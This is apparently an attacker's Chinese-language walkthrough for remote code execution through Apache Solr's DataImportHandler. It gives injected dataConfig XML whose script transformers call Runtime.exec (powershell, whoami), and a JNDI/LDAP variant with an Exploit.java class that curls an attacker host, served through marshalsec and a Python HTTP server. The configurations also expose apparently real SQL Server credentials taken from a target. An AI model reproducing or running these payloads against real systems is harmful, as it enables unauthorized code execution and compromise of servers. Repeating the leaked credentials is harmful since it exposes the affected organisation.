Apache Solr DataImportHandler RCE
1.首先判读是否solr不需认证直接可访问后台(大多数均可访问)
2.判断是否存在collections
3.判断collections是否可以使用dataimport功能
4.debug模式修改configuration
原:
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
user="pid.trainup"
password="S@cram3nt0"
readOnly="true"
/>
<document name="TrainUpDoc">
<entity name="Lo" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithoutLocation order by ItemTitle">
<field column="ItemTitle" name="ItemTitle"/>
<field column="ItemCourseId" name="ItemCourseId"/>
<field column="ItemDescription" name="ItemDescription"/>
<field column="Price" name="ItemPrice"/>
<field column="ItemDurationType" name="ItemDurationType"/>
<field column="ItemDurationValue" name="ItemDurationValue"/>
<field column="typeItemCode" name="typeItemCode"/>
<field column="ProviderWeight" name="ProviderWeight"/>
<field column="ItemCatId" name="ItemCatId"/>
<field column="PublishedDate" name="PublishedDate"/>
<field column="ItemImageUrl" name="ItemImageUrl"/>
<field column="ItemTrainingRating" name="ItemTrainingRating"/>
<field column="#Row" name="#Row"/>
<field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
<field column="ItemEventsno" name="ItemEventsno"/>
<field column="CourseWeight" name="CourseWeight"/>
<field column="CategoryRankScore" name="CategoryRankScore"/>
</entity>
</document>
</dataConfig>[1] 无回显 直接执行命令修改:
(1)在entity中添加transformer="script:f1",f1为函数名
(2)添加<script>内容
(3)execute with this configuration
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
user="pid.trainup"
password="S@cram3nt0"
readOnly="true"
/>
<script><![CDATA[
function f1(row){
java.lang.Runtime.getRuntime().exec("powershell xxx");
return row;
}
]]></script>
<document name="TrainUpDoc">
<entity name="Lo" transformer="script:f1" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle">
<field column="ItemTitle" name="ItemTitle"/>
<field column="ItemCourseId" name="ItemCourseId"/>
<field column="ItemDescription" name="ItemDescription"/>
<field column="Price" name="ItemPrice"/>
<field column="ItemDurationType" name="ItemDurationType"/>
<field column="ItemDurationValue" name="ItemDurationValue"/>
<field column="typeItemCode" name="typeItemCode"/>
<field column="ProviderWeight" name="ProviderWeight"/>
<field column="ItemCatId" name="ItemCatId"/>
<field column="PublishedDate" name="PublishedDate"/>
<field column="ItemImageUrl" name="ItemImageUrl"/>
<field column="ItemTrainingRating" name="ItemTrainingRating"/>
<field column="#Row" name="#Row"/>
<field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
<field column="ItemEventsno" name="ItemEventsno"/>
<field column="CityItemEventsno" name="CityItemEventsno"/>
<field column="StartDate" name="StartDate"/>
<field column="StartTime" name="StartTime"/>
<field column="TimeZone" name="TimeZone"/>
<field column="MarketCityID" name="MarketCityID"/>
<field column="ItemCity" name="ItemCity"/>
<field column="CourseWeight" name="CourseWeight"/>
<field column="CategoryRankScore" name="CategoryRankScore"/>
</entity>
</document>
</dataConfig>
[2] 有回显 直接执行命令修改:
(1)在entity中添加transformer="script:f1",f1为函数名
(2)添加<script>内容,将执行回显输出到field的参数重,如id、ItemDescription,若不行则需结合managed-schema配置输出
(3)execute with this configuration
<dataConfig>
<dataSource type="JdbcDataSource"
driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
user="pid.trainup"
password="S@cram3nt0"
readOnly="true"
/>
<script><![CDATA[
function f1(row){
row.put("id",new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("whoami").getInputStream())).readLine());
return row;
}
]]></script>
<document name="TrainUpDoc">
<entity name="Lo" transformer="script:f1" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle">
<field column="ItemCourseId" name="id"/>
<field column="ItemDescription" name="ItemDescription"/>
<field column="Price" name="ItemPrice"/>
<field column="ItemDurationType" name="ItemDurationType"/>
<field column="ItemDurationValue" name="ItemDurationValue"/>
<field column="typeItemCode" name="typeItemCode"/>
<field column="ProviderWeight" name="ProviderWeight"/>
<field column="ItemCatId" name="ItemCatId"/>
<field column="PublishedDate" name="PublishedDate"/>
<field column="ItemImageUrl" name="ItemImageUrl"/>
<field column="ItemTrainingRating" name="ItemTrainingRating"/>
<field column="#Row" name="#Row"/>
<field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
<field column="ItemEventsno" name="ItemEventsno"/>
<field column="CityItemEventsno" name="CityItemEventsno"/>
<field column="StartDate" name="StartDate"/>
<field column="StartTime" name="StartTime"/>
<field column="TimeZone" name="TimeZone"/>
<field column="MarketCityID" name="MarketCityID"/>
<field column="ItemCity" name="ItemCity"/>
<field column="CourseWeight" name="CourseWeight"/>
<field column="CategoryRankScore" name="CategoryRankScore"/>
</entity>
</document>
</dataConfig>
[3] JNDI+LDAP(无需目标的CLASSPATH存在数据库驱动):
(1)修改configuration内容
<dataConfig>
<dataSource type="JdbcDataSource"
jndiName="ldap://xxx.xxx.xxx.xxx:1389/Exploit"/>
<document>
<entity name="test">
</entity>
</document>
</dataConfig> (2)hackserver
Exploit.java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.*;
import java.util.Hashtable;
public class Exploit implements ObjectFactory {
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
try {
Runtime.getRuntime().exec("curl http://xxx.xxx.xxx.xxx:1212/getshell");
} catch (IOException e) {
e.printStackTrace();
}
return null;
}
}JDK 高版本会限制远程codebase 加载,期待1.8以下
javac --release 7 Exploit.java
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndiDAPRefServer http://xxx.xxx.xxx.xxx:8888/#Exploit 1389
python3 -m http.server 8888
(3)execute with this configuration
